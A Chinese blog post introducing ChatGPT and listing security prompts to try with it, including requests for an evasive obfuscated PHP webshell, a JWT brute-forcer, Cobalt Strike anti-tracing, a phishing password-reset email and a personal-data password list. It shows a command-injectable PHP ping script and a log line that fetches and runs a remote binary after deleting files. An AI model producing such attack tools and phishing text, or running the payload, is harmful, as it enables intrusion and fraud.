基础入门-ChatGPT&结合安全&融入技术&高效赋能&拓展需求

简介: 基础入门-ChatGPT&结合安全&融入技术&高效赋能&拓展需求

d862457ee3834c04a7a86eeffe2303ca.png


Chatgpt科普

1.ChatGPT是什么?


ChatGPT–可能很多人被这个缩写的名字搞糊涂了,第一眼无法看出到底什么意思,GPT 的英文原文是 Generative Pre-training Transformer(预训练生成模型),业界有人将 ChatGPT 概括为聊天机器人+搜索工具+文本创造工具的组合,或者简单理解它是一个生成式 AI(内容生成器)。


2.ChatGPT能做什么?

它的主要功能是协助回答问题、提供信息和生成有关历史、科学、地理等各种主题的信息,这些信息仅限于它所接受的训练,但其知识在不断扩展。


3.ChatGPT牛在哪里?

(1)它是个通用的模型,只要提示词引导,就能快速适应不同领域。

(2)它能理解你的问题,只要给的引导越多,它就能给出你想要的答案。


4.安全行业影响:

(1)整合多种恶意软件

(2)提升问题发现能力

(3)给新手攻击者赋能

(4)便于社会工程学攻击

(5)快速筛选和锁定目标

(6)模拟网络防御攻击技术


利用:

安全开发

1、如何使用Python写一个jwt爆破脚本?

2、如何使用Python写一个Webshell检测脚本?

3、如何使用Python写一个MS17010检测脚本?

4、使用PHP开发一个免杀混淆复杂的webshell脚本

5、如何发现PHP脚本被禁用了敏感函数,生成一个绕过的webshell


逆向免杀

1、APK使用什么工具进行反编译?

2、常见脱壳工具有那些?

3、免杀中使用什么加壳效果好?


代码审计

1、下面代码会出现哪些安全漏洞?又该如何利用呢?

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    $html .= "<pre>{$cmd}</pre>";
}

?>

2、Thinkphp历史漏洞有哪些?

3、shiro反序列化漏洞如何利用?


蓝队应急

0、平台项目:

蓝队针对攻击威胁感知平台项目有哪些?

1、日志分析:

103.178.229.152 - - [12/Mar/2023:07:16:02 +0800] “GET /shell?cd+/tmp;rm±rf+*;wget+128.199.134.42/jaws;sh+/tmp/jaws HTTP/1.1” 404 146 “-” “Hello, world”

afe4b572409014dcc5877cd991a2ac89_e48d3411c94c46f584ddb6ca5e1f3a53.png

2、流量检测:

写一个检测cobaltstrike payload的脚本

写一个Cobalstrike检测rules规则


APT社工学

1、防溯源:Cobaltstike如何防止被溯源

2、钓鱼邮件:由于系统升级,公司通知员工必须修改自己的密码,请在新业务网站上进行修改,帮我写一份规范的邮件通知

3、字典生成:用户名:xiaodi 电话:13512345678 QQ:471656814 密码组合?

其他相关:

网络安全测试简历模版 早知道前几天投简历就用这个了 emmm

网络安全测试报告模版

相关文章
用 ChatGPT 编写英文技术文章要自己多审核,否则容易被严谨的同行喷
用 ChatGPT 编写英文技术文章要自己多审核,否则容易被严谨的同行喷
|
1月前
|
人工智能 运维 架构师
【从瀑布模式到水母模式:ChatGPT如何赋能软件研发全流程】
【从瀑布模式到水母模式:ChatGPT如何赋能软件研发全流程】
69 0
|
1月前
|
机器学习/深度学习 数据采集 存储
4个维度讲透ChatGPT技术原理,揭开ChatGPT神秘技术黑盒
4个维度讲透ChatGPT技术原理,揭开ChatGPT神秘技术黑盒
|
1月前
|
存储 自然语言处理 搜索推荐
ChatGPT 文本Embedding融合Qdrant向量数据库:构建智能问答系统的技术探索
向量数据库结合ChatGPT带来了什么 1. **语义搜索:** 使用向量数据库进行语义搜索,可以更准确地找到与查询相关的信息。ChatGPT可以理解用户的自然语言查询,而向量数据库可以根据语义相似性返回匹配的向量数据。 2. **智能推荐:** 结合ChatGPT的智能理解和向量数据库的相似性搜索,可以实现更智能的推荐系统。系统可以根据用户的历史行为和语境,向用户推荐相似的向量数据,如文章、产品或其他内容。 3. **自然语言处理与向量表示结合:** ChatGPT可以将自然语言转换为向量表示,这样就可以在向量数据库中进行更高效的查询。这种集成使得自然语言处理和向量数据库可以相互补充等
445 0
|
1月前
|
机器学习/深度学习 人工智能 算法
【极客技术】ColossalChat用完整RLHF技术克隆ChatGPT的开源解决方案
【极客技术】ColossalChat用完整RLHF技术克隆ChatGPT的开源解决方案
59 0
|
10天前
|
机器学习/深度学习 人工智能 自然语言处理
【人工智能】第一部分:ChatGPT的基本概念和技术背景
【人工智能】第一部分:ChatGPT的基本概念和技术背景
21 6
|
10天前
|
机器学习/深度学习 人工智能 算法
【人工智能】第四部分:ChatGPT的技术实现
【人工智能】第四部分:ChatGPT的技术实现
12 3
|
1月前
|
机器学习/深度学习 自然语言处理 安全
什么是 ChatGPT 生成的文本里所谓的安全词汇
什么是 ChatGPT 生成的文本里所谓的安全词汇
|
1月前
|
自然语言处理 算法 程序员
chatgpt如何赋能程序员
ChatGPT作为一种先进的自然语言处理模型,可以为程序员提供多方面的赋能,助力他们更高效地完成编程工作。以下是ChatGPT如何赋能程序员的几个关键方面: **1. 代码理解与解释**: ChatGPT能够解析和理解复杂的编程逻辑,帮助程序员理解代码的功能和意图。当程序员遇到难以理解的代码段时,ChatGPT可以提供解释和说明,帮助他们快速掌握代码的核心逻辑。 **2. 代码自动生成与优化**: 基于其强大的自然语言处理能力,ChatGPT能够根据程序员的描述或需求,自动生成相应的代码片段。这不仅可以节省程序员的编写时间,还能提供多种可能的实现方式,供程序员选择和优化。 **3. 错误
|
1月前
|
机器学习/深度学习 人工智能 自然语言处理
技术小白能看懂的ChatGPT原理介绍
网上有关 ChatGPT 的原理介绍文章一大堆,要么是从 NLP 的历史开始讲起,要么是上数 GPT 3 代,内容都相对冗长和复杂。其实 ChatGPT 的原理并不难理解,我将以最通俗易懂的方式为技术小白解读,帮助大家更好地了解这一技术
538 1
技术小白能看懂的ChatGPT原理介绍